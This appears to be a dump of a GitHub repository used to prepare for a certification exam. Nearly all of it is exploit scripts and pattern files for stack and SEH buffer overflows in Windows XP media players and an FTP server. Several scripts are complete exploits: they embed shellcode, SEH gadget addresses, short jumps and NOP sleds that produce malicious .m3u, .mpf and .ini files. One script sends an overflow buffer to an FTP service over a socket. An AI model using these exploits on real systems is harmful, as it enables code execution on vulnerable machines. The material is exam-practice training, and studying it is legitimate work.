"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9" 5 | 6 | fo = open("foo.m3u", "wb") 7 | fo.write (buff) 8 | fo.close() 9 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/mediacoder_0.8.43.5830/mediacoder_shellcode_calc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 4 | "\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e" 5 | "\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb" 6 | "\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a" 7 | "\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b" 8 | "\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b" 9 | "\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32" 10 | "\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0" 11 | "\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d" 12 | "\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad" 13 | "\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85" 14 | "\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d" 15 | "\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1" 16 | "\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd" 17 | "\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3") 18 | 19 | 20 | seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll 21 | nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode 22 | nop_sled = "\x90" * 14 23 | 24 | buff = "http:// " 25 | buff += "A" * 776 26 | buff += nseh 27 | buff += seh 28 | buff += nop_sled 29 | buff += shellcode 30 | buff += "D" * (4216 - (len(shellcode + nop_sled))) 31 | fo = open("foo.m3u", "wb") 32 | fo.write (buff) 33 | fo.close() 34 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $sploitfile="c0d3r.mpf"; 4 | 5 | my $sploitfile="c0d3r.mpf"; 6 | my $junk = "http://"; 7 | $junk=$junk."A"x5000; 8 | my $payload=$junk; 9 | print " [+] Writing exploit file $sploitfile\n"; 10 | open (myfile,">$sploitfile"); 11 | print myfile $payload;close (myfile); 12 | print " [+] File written\n"; 13 | print " [+] " . length($payload)." bytes\n"; 14 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_eip_b_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="BBBB"; 8 | my $seh="CCCC"; 9 | my $shellcode="D"x($totalsize-length($junk.$nseh.$seh)); 10 | my $payload=$junk.$nseh.$seh.$shellcode; 11 | print " [+] Writing exploit file $sploitfile\n"; 12 | open (myfile,">$sploitfile"); 13 | print myfile $payload;close (myfile); 14 | print " [+] File written\n"; 15 | print " [+] " . length($payload)." bytes\n"; 16 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_popx2ret_confirm_location_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="\xcc\xcc\xcc\xcc"; #breakpoint, sploit should stop here 8 | my $seh=pack('V',0x76C37AAD); 9 | my $shellcode="A123456789B123456789C123456789"; 10 | my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$shellcode)); 11 | my $payload=$junk.$nseh.$seh.$shellcode.$junk2; 12 | print " [+] Writing exploit file $sploitfile\n"; 13 | open (myfile,">$sploitfile"); 14 | print myfile $payload;close (myfile); 15 | print " [+] File written\n"; 16 | print " [+] " . length($payload)." bytes\n"; 17 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_popx2ret_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="\xcc\xcc\xcc\xcc"; #breakpoint, sploit should stop here 8 | my $seh=pack('V',0x76C37AAD); 9 | my $shellcode="D"x($totalsize-length($junk.$nseh.$seh)); 10 | my $payload=$junk.$nseh.$seh.$shellcode; 11 | print " [+] Writing exploit file $sploitfile\n"; 12 | open (myfile,">$sploitfile"); 13 | print myfile $payload;close (myfile); 14 | print " [+] File written\n"; 15 | print " [+] " . length($payload)." bytes\n"; 16 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_popx2ret_smalljump.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="\xeb\x1e\x90\x90"; #breakpoint, sploit should stop here 8 | my $seh=pack('V',0x76C37AAD); 9 | my $nops="\x90" x 24; 10 | my $shellcode="\xcc\xcc\xcc\xcc"; 11 | my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$nops.$shellcode)); 12 | my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2; 13 | print " [+] Writing exploit file $sploitfile\n"; 14 | open (myfile,">$sploitfile"); 15 | print myfile $payload;close (myfile); 16 | print " [+] File written\n"; 17 | print " [+] " . length($payload)." bytes\n"; 18 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/millenium_mp3/millenium_shellcode.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $totalsize=5005; 4 | my $sploitfile="c0d3r.mpf"; 5 | my $junk = "http://"; 6 | $junk=$junk."A" x 4105; 7 | my $nseh="\xeb\x1e\x90\x90"; #jump 30 bytes 8 | my $seh=pack('V',0x1002083D); #pop pop ret from "xaudio".dll 9 | my $nops="\x90" x 24; 10 | my $shellcode= "\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" . 11 | "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . 12 | "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . 13 | "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . 14 | "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" . 15 | "\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" . 16 | "\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" . 17 | "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" . 18 | "\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" . 19 | "\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" . 20 | "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" . 21 | "\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" . 22 | "\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" . 23 | "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" . 24 | "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" . 25 | "\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" . 26 | "\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" . 27 | "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" . 28 | "\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" . 29 | "\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" . 30 | "\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" . 31 | "\x31\x42\x4c\x45\x33\x45\x50\x41\x41"; 32 | 33 | my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$nops.$shellcode)); 34 | my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2; 35 | print " [+] Writing exploit file $sploitfile\n"; 36 | open (myfile,">$sploitfile"); 37 | print myfile $payload;close (myfile); 38 | print " [+] File written\n"; 39 | print " [+] " . length($payload)." bytes\n"; 40 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/not_completed/easyrmtomp3/corelantutpart-2/test1.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/not_completed/easyrmtomp3/corelantutpart-2/test1.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/not_completed/fuzzysec3/div1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -w 2 | 3 | filename="evil.plf" 4 | 5 | buffer = "A"*2000 6 | 7 | textfile = open(filename, 'w') 8 | textfile.write(buffer) 9 | textfile.close() 10 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/soritong_mp3_player_1.0/sori_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | ################################################### 4 | #Soritong MP# Player 1.0 Universal Local BoF (SEH)# 5 | ###########https://github.com/jacobforer########### 6 | ################################################### 7 | 8 | $uitxt = "ui.txt"; 9 | 10 | my $junk = "A" x 1000; 11 | 12 | open(myfile,">$uitxt") ; 13 | print myfile $junk; 14 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/soritong_mp3_player_1.0/ui.txt: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_SEH_nseh_overwrite.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_SEH_nseh_overwrite.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_SEH_nseh_ppr_badchars.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_SEH_nseh_ppr_badchars.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/tomabo_eip_crash.m3u: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/whatever.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/whatever.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/total_video_player/Settings.ini: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/total_video_player/Settings.ini -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/total_video_player/total_vid_player_eip_overwrite.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 5000; # sets buffer size for consistent sized payload 4 | my $header = "[Support Groups]\r\nVideo="; # start of ini file 5 | my $footer = "\r\n[AssociateType]\r\nAssociateType =1"; # end of ini file (after buffer) 6 | my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"; 7 | 8 | my $sploit = $header.$junk.$footer; # build spoit portion of buffer 9 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk for consistent size 10 | my $buffer = $sploit.$fill; # build final buffer 11 | 12 | # write the exploit buffer to file 13 | my $file = "Settings.ini"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer) . "\n"; 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/3afs2.24.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import ftplib 4 | from ftplib import FTP 5 | import struct 6 | 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | buffer = "A" *966 + "B" *4 + "C" *1000 10 | 11 | print "\nSending evil buffer..." 12 | s.connect(('172.16.73.129',21)) 13 | data = s.recv(1023) 14 | s.send('USER ftp\r\n') 15 | data = s.recv(1024) 16 | s.send('PASS ftp\r\n') 17 | data = s.recv(1024) 18 | s.send('STOR ' + buffer + '\r\n') 19 | s.close() 20 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/4afs2.24.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | 6 | shellcode=("\xda\xd8\xbf\x4b\x36\x12\x12\xd9\x74\x24\xf4\x58\x29\xc9\xb1" 7 | "\x53\x83\xc0\x04\x31\x78\x13\x03\x33\x25\xf0\xe7\x3f\xa1\x76" 8 | "\x07\xbf\x32\x17\x81\x5a\x03\x17\xf5\x2f\x34\xa7\x7d\x7d\xb9" 9 | "\x4c\xd3\x95\x4a\x20\xfc\x9a\xfb\x8f\xda\x95\xfc\xbc\x1f\xb4" 10 | "\x7e\xbf\x73\x16\xbe\x70\x86\x57\x87\x6d\x6b\x05\x50\xf9\xde" 11 | 